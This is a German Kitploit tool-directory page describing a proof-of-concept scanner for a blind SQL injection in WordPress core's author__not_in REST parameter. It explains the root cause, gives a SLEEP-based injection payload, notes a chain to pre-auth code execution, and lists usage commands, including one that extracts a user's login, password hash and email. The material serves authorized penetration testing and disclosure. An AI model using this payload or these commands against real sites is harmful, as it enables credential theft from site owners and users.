Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-60137-WordPress-Core-SQL-Injection-PoC — Nicht-destruktiver Proof-of-Concept- und Verifizierungsrahmen für CVE-2026-60137, eine blinde SQL-Injection im WordPress-Kern (`WP_Query::author__not_in`), erreichbar über den `author_exclude`-Parameter der REST-API. | Kitploit
Tools/GitHubGitHub/abdullahmaqbool22/cve-2026-60137-wordpress-core-sql-injection-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubabdullahmaqbool22/cve-2026-60137-wordpress-core-sql-injection-poc

CVE-2026-60137-WordPress-Core-SQL-Injection-PoC

Nicht-destruktiver Proof-of-Concept- und Verifizierungsrahmen für CVE-2026-60137, eine blinde SQL-Injection im WordPress-Kern (`WP_Query::author__not_in`), erreichbar über den `author_exclude`-Parameter der REST-API.

Repository anzeigen
vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-60137 – WordPress-Core-SQL-Injection-PoC

Nicht-destruktiver Proof-of-Concept und Verifizierungs-Harness für CVE-2026-60137, eine blinde SQL-Injection im WordPress-Core (WP_Query::author__not_in), erreichbar über den Parameter author_exclude der REST-API.

Grundursache

WP_Query::get_posts() baut SQL auf, indem es die Query-Variable author__not_in per String-Konkatenation in Folgendes einfügt:

root@kitploit:~
... AND {wpdb->posts}.post_author NOT IN ( <value> )

Der Wert wird nur dann bereinigt (pro Element absint), wenn er als Array ankommt. Wenn ein skalarer String übermittelt wird – der REST-Parameter author_exclude wird intern auf abgebildet – wird der -Sanitierungs-Guard übersprungen und der rohe String landet in der -Klausel, was zu einer SQL-Injection führt ().

author__not_in
is_array()
NOT IN (...)
CWE-89

Ein Payload der Form 1) OR SLEEP(6)# erzeugt:

root@kitploit:~
post_author NOT IN ( 1) OR SLEEP(6)# )

was als post_author NOT IN (1) OR SLEEP(6) geparst wird (das abschließende ) wird vom #-Kommentar konsumiert) – ein sauberes, zeitbasiertes Blind-Oracle ohne Datenbankschreibzugriffe.

Betroffen / Behoben

Betroffen6.8.0 – 6.8.5, 6.9.0 – 6.9.4, 7.0.0 – 7.0.1
Behoben6.8.6, 6.9.5, 7.0.2 (2026-07-17)
CVSS 3.1AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N → 5.9 (eigenständiger Sink)
Kombiniertmit CVE-2026-63030 (REST-Batch-Routen-Verwechslung) → 9.8 Pre-Auth-RCE auf 6.9.0 – 7.0.1

Hinweise zur Erreichbarkeit

  • 6.9.0+ — Sink ohne Authentifizierung erreichbar über die Routen-Verwechslung von /wp-json/batch/v1.
  • 6.8.x — Das REST-Schema lehnt einen skalaren author_exclude (HTTP 400) auf der Standard-Posts-Route ab. Daher ist der Sink normalerweise nur erreichbar, wenn ein Plugin/Theme unvertrauenswürdige Eingaben weiterreicht, oder über eine authentifizierte Sitzung (--cookie) über die Batch-Route.

Was das Skript tut

cve_2026_60137_poc.py ist gegenüber der Datenbank schreibgeschützt:

  1. Ermittelt den Fingerabdruck des Ziels (Generator-Meta-Tag, Feed, readme.html, /wp-json/-Index), um zu prüfen, ob die Version in einem betroffenen Bereich liegt.
  2. Erkennt die Injection mit einem zeitbasierten Oracle: Basislinie vs. eine SLEEP(0)-Parse-Kontrolle vs. ein SLEEP(n)-Payload, über mehrere Zustellvektoren (direkte REST-Routen, ?rest_route= und den Batch-Endpunkt), und meldet ein Ergebnis pro Vektor.
  3. Extrahiert optional eine wp_users-Zeile (user_login, user_pass, user_email) per Blind-Binary-Search-Timing, streng unter Verwendung von SELECT/SLEEP — es schreibt nie in die Datenbank.

Verwendung

root@kitploit:~
# Nur Fingerprint, keine Payloads senden
python3 cve_2026_60137_poc.py --url https://target --safe

# Die Erkennungsmatrix ausführen
python3 cve_2026_60137_poc.py --url https://target --sleep 6 --samples 3

# Authentifizierte Sitzung + wp_users Zeile 1 extrahieren
python3 cve_2026_60137_poc.py --url https://target \
    --cookie 'wordpress_logged_in_XXX=YYY' --extract --user-id 1

# Über Burp routen, TLS-Verifizierung überspringen, maschinenlesbare Beweise speichern
python3 cve_2026_60137_poc.py --url https://target \
    --proxy http://127.0.0.1:8080 --no-verify-tls --json-out evidence.json

Optionen

FlagStandardBeschreibung
--urlerforderlichBasis-URL des Ziels
--safeausNur Fingerprint; keine Payloads senden
--sleep6SLEEP()-Sekunden, die vom Erkennungs-Oracle verwendet werden
--samples3Zeitmessproben pro Messung (Median wird verwendet)
--threshold0.7Anteil von --sleep, der als positive Abweichung gewertet wird
--extractausEine wp_users-Zeile über das Blind-Oracle extrahieren
--user-id1Zu extrahierende wp_users.ID
--extract-sleep2.0SLEEP()-Sekunden pro Extraktionsprobe
--limit64Maximale Zeichen pro extrahiertem Feld
--only-vector—Nur Vektoren testen, deren Name diese Zeichenkette enthält
--cookie—Authentifiziertes Cookie für auth-geschützte Vektoren
--proxy—HTTP(S)-Proxy, z. B. http://127.0.0.1:8080 (Burp)
--timeout30Request-Timeout in Sekunden
--no-verify-tlsausTLS-Zertifikatsprüfung deaktivieren
--json-out—Maschinenlesbare Beweisdaten in eine JSON-Datei schreiben

Rechtliche Hinweise / Verantwortungsvolle Nutzung

Dieses Tool wird ausschließlich für autorisierte Sicherheitstests bereitgestellt — Penetrationstests, CTFs und Forschung an Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zur Prüfung haben. Der Einsatz gegen Systeme ohne Autorisierung ist illegal. Der Autor übernimmt keine Haftung für Missbrauch.

Jede mit --json-out geschriebene Ausgabe kann die getestete URL, den Versions-Fingerabdruck und Timing-Beweise enthalten — behandeln Sie sie als vertrauliche Auftragsdaten.

Tool herunterladen